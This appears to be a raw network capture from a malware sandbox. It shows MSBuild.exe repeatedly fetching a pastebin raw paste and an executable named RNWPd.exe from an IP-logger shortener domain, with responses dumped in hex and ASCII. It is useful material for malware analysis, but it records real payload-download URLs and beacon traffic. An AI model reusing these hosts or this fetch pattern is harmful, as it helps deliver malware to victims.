2024-09-16 19:22:15 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433966e8098ca7-EWR
2024-09-16 19:22:15 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:22:15 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:22:15 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:22:15 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:22:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	49762	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:16 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:22:17 UTC	899	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.42901611328125 expires: Mon, 16 Sep 2024 19:22:16 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:22:17 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HZvD3T3Jyq3069EE8U6iA9%2BE%2BDK4Qcw%2BpEznX4m73aQJefLoaB%2BMaGIcZVM1tYz56Mi79KIT2AYX8ZHOad0NIsFcN9YJ6JtnUbze1XlEcs2a02VSPVwwWOA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c43396fdc5d32d0-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:22:17 UTC	470	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:22:17 UTC	1369	IN	Data Raw: 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 Data Ascii: er" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property
2024-09-16 19:22:17 UTC	1369	IN	Data Raw: 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 Data Ascii: olor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0
2024-09-16 19:22:17 UTC	1369	IN	Data Raw: 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b Data Ascii: AgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);
2024-09-16 19:22:17 UTC	1369	IN	Data Raw: 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 Data Ascii: tyle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-r
2024-09-16 19:22:17 UTC	1369	IN	Data Raw: 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 Data Ascii: margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="d
2024-09-16 19:22:17 UTC	155	IN	Data Raw: 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: e.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:22:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	49763	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:21 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:22:22 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c43398f8f6318ae-EWR
2024-09-16 19:22:22 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:22:22 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:22:22 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:22:22 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:22:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	49764	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:22 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:22:23 UTC	906	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:22:23 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:22:23 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n2%2FTD3pdS3J1%2F%2B0P9LYLqOM%2BosfH1qjlOm5yThjrnZpTTkd76nJMjdmjuh%2F5k1SzOlxm9lypoPAw7nGZ7lPqOOHPohEMCgkJegfBAo4UnMmQZ%2FpjozVEiLI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c4339962f6b1927-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:22:23 UTC	463	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:22:23 UTC	1369	IN	Data Raw: 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 Data Ascii: sit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta p
2024-09-16 19:22:23 UTC	1369	IN	Data Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 